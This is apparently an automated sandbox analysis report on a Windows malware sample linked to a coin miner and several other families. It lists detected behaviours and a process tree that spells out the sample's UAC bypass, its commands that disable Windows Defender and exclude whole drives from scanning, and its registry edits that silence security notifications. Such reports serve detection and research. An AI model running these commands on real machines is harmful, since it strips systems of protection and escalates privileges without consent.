Analysis

  • max time kernel
    150s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/03/2025, 07:52

General

  • Target

    2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe

  • Size

    15.7MB

  • MD5

    06d8029fd7cb9f12d121f936433c191d

  • SHA1

    eb456ebc23601b2290f627a292c638d3bd73f9b3

  • SHA256

    325fec27cfd9bacb93e2fe9f984a65adb886b6dcfbe6955404571419569e30f4

  • SHA512

    05fae54f2971c2e57a38bfaddedfafad16312890449425f09792fa6efde62de4dfaa3ef7a12a90b5ab246303ba96fab82cd1d43c71eeb348453a1d47923d782d

  • SSDEEP

    196608:xAACNbhcF1WKW6whfOjGvAWHMMH1OAY8PyedZLOOW7j7XlivZqOXmtubmxl5ppr6:xAAghcflGvF0t7iZqptmmH5Hm

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 28 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 16 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Modifies Windows Firewall 2 TTPs 18 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Modifies Security services 2 TTPs 20 IoCs

    Modifies the startup behavior of a security service.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with WMI 11 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Start.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2420
        • C:\Windows\SysWOW64\wscript.exe
          C:\Windows\System32\WScript.exe "C:\Users\Public\testvb1.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public\ & copy /v /b /y C:\Users\Public\testvb1.vbs C:\Users\Public\testvb2.vbs
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
          4⤵
            PID:700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start2.cmd' -windowstyle hidden"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2900
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\Start2.cmd" "
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:600
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start2.cmd"
                6⤵
                  PID:2720
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2600
                • C:\Windows\SysWOW64\find.exe
                  C:\Windows\System32\find.exe "0x0"
                  6⤵
                    PID:2612
                  • C:\Windows\SysWOW64\reg.exe
                    C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
                    6⤵
                      PID:2620
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\uac.cmd' -windowstyle hidden"
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2684
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.cmd" "
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2040
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' -Verb RunAs -Wait -windowstyle hidden"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1484
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                            9⤵
                              PID:2660
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                10⤵
                                • UAC bypass
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2864
                      • C:\Windows\SysWOW64\PING.EXE
                        C:\Windows\System32\ping.exe 192.168.1.1 -n 3
                        6⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:892
                      • C:\Windows\SysWOW64\reg.exe
                        C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                        6⤵
                          PID:3048
                        • C:\Windows\SysWOW64\find.exe
                          C:\Windows\System32\find.exe "0x0"
                          6⤵
                            PID:1044
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Start3.cmd'" -Encoding ascii}" -Wait
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1824
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start3.cmd' -verb runas -windowstyle hidden"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2568
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Start3.cmd"
                              7⤵
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              PID:2028
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd' -verb runas -windowstyle hidden"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:336
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd"
                                  9⤵
                                    PID:1060
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension bat
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1680
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -MAPSReporting Disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:840
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1688
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -PUAProtection disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2908
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ScanScheduleDay "8"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2064
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -HighThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2680
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ModerateThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2352
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -LowThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1260
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -SevereThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1964
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2776
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2212
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:592
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:524
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2148
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\L2cache"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2276
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2636
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tfile"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2620
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tweaker"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2960
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension cmd
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1480
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension exe
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2100
                                • C:\Windows\SysWOW64\net.exe
                                  C:\Windows\System32\NET.exe stop windefend
                                  8⤵
                                    PID:2704
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop windefend
                                      9⤵
                                        PID:644
                                    • C:\Windows\SysWOW64\sc.exe
                                      C:\Windows\System32\SC.exe config windefend start=disabled
                                      8⤵
                                      • Launches sc.exe
                                      PID:616
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f /reg:64
                                      8⤵
                                        PID:868
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1756
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                        8⤵
                                          PID:1780
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                          8⤵
                                            PID:1356
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                            8⤵
                                              PID:1244
                                            • C:\Windows\SysWOW64\reg.exe
                                              C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                              8⤵
                                                PID:1744
                                              • C:\Windows\SysWOW64\reg.exe
                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                                8⤵
                                                  PID:1040
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                                  8⤵
                                                    PID:2412
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                    8⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:924
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                    8⤵
                                                      PID:1348
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                      8⤵
                                                        PID:2308
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f /reg:64
                                                        8⤵
                                                          PID:2184
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                          8⤵
                                                            PID:2364
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f /reg:64
                                                            8⤵
                                                              PID:1532
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                              8⤵
                                                                PID:1664
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f /reg:64
                                                                8⤵
                                                                  PID:928
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                  8⤵
                                                                    PID:3056
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f /reg:64
                                                                    8⤵
                                                                      PID:1668
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                                                      8⤵
                                                                        PID:1944
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d "00000001" /f /reg:64
                                                                        8⤵
                                                                          PID:1524
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:1048
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f /reg:64
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:1772
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:2088
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1360
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:2508
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:2664
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:2544
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                          8⤵
                                                                          • Modifies Windows Defender notification settings
                                                                          PID:2232
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f /reg:64
                                                                          8⤵
                                                                            PID:3068
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                            8⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2560
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                            8⤵
                                                                              PID:1000
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                              8⤵
                                                                                PID:1716
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                                8⤵
                                                                                  PID:592
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                  8⤵
                                                                                    PID:372
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                    8⤵
                                                                                      PID:908
                                                                                    • C:\Windows\SysWOW64\reg.exe
